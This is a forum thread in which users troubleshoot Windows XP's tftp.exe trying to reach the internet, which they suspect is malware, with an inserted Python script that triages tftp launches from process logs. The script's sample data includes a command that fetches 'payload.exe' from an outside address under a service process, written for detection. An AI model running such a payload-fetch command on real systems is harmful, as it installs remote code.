tftp trying to access internet. Should it?


H. S.

Hello,

I have a friend who has Windows XP (updated) running on his PC and he
asked me today if a message by zone alarm was anything to worry about.
It reported that TFTP application was trying to access the internet. I
suggested he deny it for now. Is there any reason the trivial FTP should
be accessing a remote website from an XP machine?

I did a search on google and discovered that it could be an indication
of Nimda or Mblast virus. However, it looks as if these are not a
problem for fully updated XP Pro. machines. Any other possibilities or
explanations for this? Suggestions? Advice?

thanks,
->HS
 

David H. Lipman

From: "H. S." <[email protected]>

| Hello,

| I have a friend who has Windows XP (updated) running on his PC and he
| asked me today if a message by zone alarm was anything to worry about.
| It reported that TFTP application was trying to access the internet. I
| suggested he deny it for now. Is there any reason the trivial FTP should
| be accessing a remote website from an XP machine?

| I did a search on google and discovered that it could be an indication
| of Nimda or Mblast virus. However, it looks as if these are not a
| problem for fully updated XP Pro. machines. Any other possibilities or
| explanations for this? Suggestions? Advice?

| thanks,
->>HS


Download MULTI_AV.EXE from the URL --
http://www.ik-cs.com/programs/virtools/Multi_AV.exe

To use this utility, perform the following...
Execute; Multi_AV.exe { Note: You must use the default folder C:\AV-CLS }
Choose; Unzip
Choose; Close

Execute; C:\AV-CLS\StartMenu.BAT
{ or Double-click on 'Start Menu' in C:\AV-CLS }

NOTE: You may have to disable your software FireWall or allow WGET.EXE to go through your
FireWall to allow it to download the needed AV vendor related files.

C:\AV-CLS\StartMenu.BAT -- { or Double-click on 'Start Menu' in C:\AV-CLS}
This will bring up the initial menu of choices and should be executed in Normal Mode.
This way all the components can be downloaded from each AV vendor's web site.
The choices are; Sophos, Trend, McAfee, Kaspersky, Exit this menu and Reboot the PC.

You can choose to go to each menu item and just download the needed files or you can
download the files and perform a scan in Normal Mode. Once you have downloaded the files
needed for each scanner you want to use, you should reboot the PC into Safe Mode [F8 key
during boot] and re-run the menu again and choose which scanner you want to run in Safe
Mode. It is suggested to run the scanners in both Safe Mode and Normal Mode.

When the menu is displayed hitting 'H' or 'h' will bring up a more comprehensive PDF help
file. http://www.ik-cs.com/multi-av.htm

Additional Instructions:
http://pcdid.com/Multi_AV.htm


* * * Please report back your results * * *
 

H. S.

David H. Lipman wrote:
* * * Please report back your results * * *

Thanks for the steps. But before I do this (the user is not comfortable
with these steps, I have to walk him through this or do this remotely),
I would still want to know if an updated XP Pro. is vulnerable to these
viruses.

->HS
 

David H. Lipman

From: "H. S." <[email protected]>


| Thanks for the steps. But before I do this (the user is not comfortable
| with these steps, I have to walk him through this or do this remotely),
| I would still want to know if an updated XP Pro. is vulnerable to these
| viruses.

Since we don't know what exactly is on the PC, I can't specifically approach the
Vulnerability issue.

All I can say is that malware is most likely using the TFTP.EXE utility of Windows to send
"stuff" home. It may be a Keylogging Trojan or it may be a worm. There is insufficient
information to come to a conclusion.
 

H. S.

David said:
From: "H. S." <[email protected]>


| Thanks for the steps. But before I do this (the user is not comfortable
| with these steps, I have to walk him through this or do this remotely),
| I would still want to know if an updated XP Pro. is vulnerable to these
| viruses.

Since we don't know what exactly is on the PC, I can't specifically approach the
Vulnerability issue.

All I can say is that malware is most likely using the TFTP.EXE utility of Windows to send
"stuff" home. It may be a Keylogging Trojan or it may be a worm. There is insufficient
information to come to a conclusion.

Fair enough.

One last question before I go all out on the possible rogue program in
the computer: is there any valid reason for the XP installation to use tftp?

By the way, the XP installation has XP Pro on it, regularly updated, IE
7, Firefox 2.0. Outlook is never used and neither is IE 7. There is no
MS office. There is yahoo messenger. MSN is never used. Skype is
installed. A typing tutor and vncviewer applications are installed. For
security, there is Zone Alarm and Norton antivirus Corp. Ed. 10.0 (also
updated). That is about it.
 

David H. Lipman

From: "H. S." <[email protected]>




| Fair enough.

| One last question before I go all out on the possible rogue program in
| the computer: is there any valid reason for the XP installation to use tftp?

| By the way, the XP installation has XP Pro on it, regularly updated, IE
| 7, Firefox 2.0. Outlook is never used and neither is IE 7. There is no
| MS office. There is yahoo messenger. MSN is never used. Skype is
| installed. A typing tutor and vncviewer applications are installed. For
| security, there is Zone Alarm and Norton antivirus Corp. Ed. 10.0 (also
| updated). That is about it.


Not the OS. Only a user.

For example, you may use the TFTP client to load a BIOS image on a Router or managed
Ethernet Switch.

There is NO reason the OS would use TFTP.EXE or the TFTP protocol without a user requesting
its use. Thus, if you aren't specifically using it and it is running, the likelihood of
malicious activity is very high.
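The point above, that tftp.exe is only ever launched because a user asked for it, is checkable if you can get process-creation records with parent information (Sysmon event ID 1, EDR telemetry, or on XP Pro the output of `wmic process get ProcessId,ParentProcessId,ExecutablePath,CommandLine`). The following is an added example and not code from this thread or from any of the tools mentioned in it: it walks each tftp.exe launch up its parent chain and scores it. The `pid|ppid|image|command line` record format, the sample records (including the documentation address 203.0.113.45), and the sets of "interactive" and "service" images are assumptions made for the example.

```python
"""Triage tftp.exe launches from process-creation records (added example).

Record format is a constructed, simplified one: pid|ppid|image|command line.
"""
import ipaddress
import re
from dataclasses import dataclass


@dataclass
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed sample records. A ppid of 0 means the parent is unknown or
# had already exited (explorer.exe's parent, userinit.exe, normally has).
SAMPLE_RECORDS = r"""
600|0|C:\WINDOWS\system32\services.exe|C:\WINDOWS\system32\services.exe
1720|600|C:\WINDOWS\system32\svchost.exe|svchost.exe -k rpcss
1204|0|C:\WINDOWS\explorer.exe|C:\WINDOWS\explorer.exe
1300|1204|C:\WINDOWS\system32\cmd.exe|"C:\WINDOWS\system32\cmd.exe"
1388|1300|C:\WINDOWS\system32\tftp.exe|tftp -i 192.168.1.1 PUT c:\fw\switch.bin switch.bin
2100|1720|C:\WINDOWS\system32\cmd.exe|cmd.exe
2400|2100|C:\WINDOWS\system32\tftp.exe|tftp -i 203.0.113.45 GET payload.exe
3100|1204|C:\WINDOWS\system32\tftp.exe|tftp.exe 192.168.1.20 get notes.txt
"""

# Windows client syntax: tftp [-i] host [GET | PUT] source [destination]
TFTP_RE = re.compile(
    r'^\s*"?(?:[A-Za-z]:\\[^"\s]*\\)?tftp(?:\.exe)?"?\s+(?:-i\s+)?'
    r'(?P<host>\S+)\s+(?P<op>get|put)\s+(?P<src>\S+)',
    re.IGNORECASE,
)

# RFC 1918 plus loopback and link-local; anything else is leaving the site.
LAN_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16")]

# Assumed for this example: images that own an interactive session on XP,
# and service images that never legitimately spawn tftp.exe (the worm
# pattern is exploited svchost.exe -> cmd.exe -> tftp.exe).
INTERACTIVE_PARENTS = {"cmd.exe", "explorer.exe"}
SERVICE_IMAGES = {"services.exe", "svchost.exe", "lsass.exe", "spoolsv.exe"}


def basename(image: str) -> str:
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_records(text: str) -> dict:
    procs = {}
    for line in text.strip().splitlines():
        pid, ppid, image, cmdline = line.split("|", 3)
        procs[int(pid)] = Proc(int(pid), int(ppid), image, cmdline)
    return procs


def ancestors(pid: int, procs: dict, limit: int = 6) -> list:
    """Parent chain of pid, nearest first; stops at unknown pids or loops."""
    chain, seen, cur = [], {pid}, procs.get(pid)
    while cur and cur.ppid in procs and cur.ppid not in seen and len(chain) < limit:
        seen.add(cur.ppid)
        cur = procs[cur.ppid]
        chain.append(cur)
    return chain


def on_lan(host: str):
    """True/False for an IP literal, None for a hostname."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return None
    return any(addr in net for net in LAN_NETS)


def assess(proc: Proc, procs: dict):
    """Return (verdict, reasons) for one tftp.exe launch."""
    score, reasons = 0, []
    m = TFTP_RE.match(proc.cmdline)
    if not m:
        return "review", ["command line is not a recognisable tftp transfer"]
    host, op = m.group("host"), m.group("op").lower()
    lan = on_lan(host)
    if lan is None:
        score += 1
        reasons.append(f"host {host} is a name; resolve it before judging")
    elif not lan:
        score += 2
        reasons.append(f"remote host {host} is outside the LAN ranges")
    if op == "get":
        score += 1
        reasons.append(f"pulls {m.group('src')} onto this machine")
    chain = [basename(p.image) for p in ancestors(proc.pid, procs)]
    if any(n in SERVICE_IMAGES for n in chain):
        score += 3
        reasons.append("launched under a service process: " + " <- ".join(chain))
    elif not chain or chain[0] not in INTERACTIVE_PARENTS:
        score += 2
        reasons.append("parent is not an interactive shell: " + (chain[0] if chain else "unknown"))
    verdict = "high" if score >= 3 else "review" if score else "likely benign"
    return verdict, reasons


def triage(text: str) -> dict:
    """Map pid -> (verdict, reasons) for every tftp.exe in the records."""
    procs = parse_records(text)
    return {p.pid: assess(p, procs)
            for p in procs.values() if basename(p.image) == "tftp.exe"}


if __name__ == "__main__":
    for pid, (verdict, reasons) in triage(SAMPLE_RECORDS).items():
        print(pid, verdict, "; ".join(reasons))
```

On the sample data the firmware upload from a user's cmd.exe under explorer.exe comes out "likely benign", the GET of payload.exe from an address outside the LAN with svchost.exe in its ancestry comes out "high", and the LAN GET from explorer.exe is left for review. A personal firewall prompt only tells you that tftp.exe wanted the network; the parent chain is what tells you whether a person asked for it.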
 

H.S.

David said:
From: "H. S." <[email protected]>




| Fair enough.

| One last question before I go all out on the possible rogue program in
| the computer: is there any valid reason for the XP installation to use tftp?

| By the way, the XP installation has XP Pro on it, regularly updated, IE
| 7, Firefox 2.0. Outlook is never used and neither is IE 7. There is no
| MS office. There is yahoo messenger. MSN is never used. Skype is
| installed. A typing tutor and vncviewer applications are installed. For
| security, there is Zone Alarm and Norton antivirus Corp. Ed. 10.0 (also
| updated). That is about it.


Not the OS. Only a user.

For example, you may use the TFTP client to load a BIOS image on a Router or managed
Ethernet Switch.

There is NO reason the OS would use TFTP.EXE or the TFTP protocol without a user requesting
its use. Thus, if you aren't specifically using it and it is running, the likelihood of
malicious activity is very high.

Here is what I found:

1. Spybot did not find anything.
2. Symantec AV Corp Ed. did not find anything.
3. There are some tftp*.* files in C: like this:
C:\Program Files\Symantec AntiVirus\TFTP2920
C:\Program Files\Symantec AntiVirus\TFTP2928
C:\Program Files\Symantec AntiVirus\TFTP3524
C:\WINDOWS\system32\tftp.exe
C:\WINDOWS\system32\dllcache\tftp.exe

The files in Symantec folder are 0 bytes long. There were only 5 or so
attempts by tftp to contact some machine in the last week or so. I
checked for the welchia worm, but there is no tftp service running and
there is no w32svc or something in the WINDOWS directory.

Given the above, any chances of infection?
 

Daave

H. S. wrote in message:
I have a friend who has Windows XP (updated) running on his PC and he
asked me today if a message by zone alarm was anything to worry about.
It reported that TFTP application was trying to access the internet. I
suggested he deny it for now. Is there any reason the trivial FTP
should be accessing a remote website from an XP machine?

I did a search on google and discovered that it could be an indication
of Nimda or Mblast virus. However, it looks as if these are not a
problem for fully updated XP Pro. machines. Any other possibilities or
explanations for this? Suggestions? Advice?

Take a look at info on W32.Spybot.ACYR at
http://www.symantec.com/security_response/writeup.jsp?docid=2006-112810-5302-99&tabid=2
 

David H. Lipman

From: "H.S." <[email protected]>

| Here is what I found:

| 1. Spybot did not find anything.
| 2. Symantec AV Corp Ed. did not find anything.
| 3. There are some tftp*.* files in C: like this:
| C:\Program Files\Symantec AntiVirus\TFTP2920
| C:\Program Files\Symantec AntiVirus\TFTP2928
| C:\Program Files\Symantec AntiVirus\TFTP3524
| C:\WINDOWS\system32\tftp.exe
| C:\WINDOWS\system32\dllcache\tftp.exe

| The files in Symantec folder are 0 bytes long. There were only 5 or so
| attempts by tftp to contact some machine in the last week or so. I
| checked for the welchia worm, but there is no tftp service running and
| there is no w32svc or something in the WINDOWS directory.

| Given the above, any chances of infection?


Still high. Albeit I'm miffed about the TFTP files in; C:\Program Files\Symantec AntiVirus

The Welchia is just one of numerous, from the Mocbot to the SDBot.

http://www.sophos.com/support/knowl...s/?search=tftp&product_search=0&action=search


Please run the Multi AV Scanning Tool.
 
